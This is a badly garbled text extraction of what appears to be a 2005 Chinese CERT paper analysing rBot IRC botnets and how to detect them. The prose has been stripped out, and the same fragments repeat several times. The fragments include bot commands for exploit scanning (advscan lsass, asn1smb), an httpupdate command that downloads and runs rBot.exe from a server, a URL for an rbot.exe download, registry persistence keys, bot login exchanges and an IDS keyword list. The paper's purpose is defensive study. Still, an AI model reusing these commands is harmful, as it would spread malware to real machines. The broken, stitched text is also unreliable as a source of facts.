TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
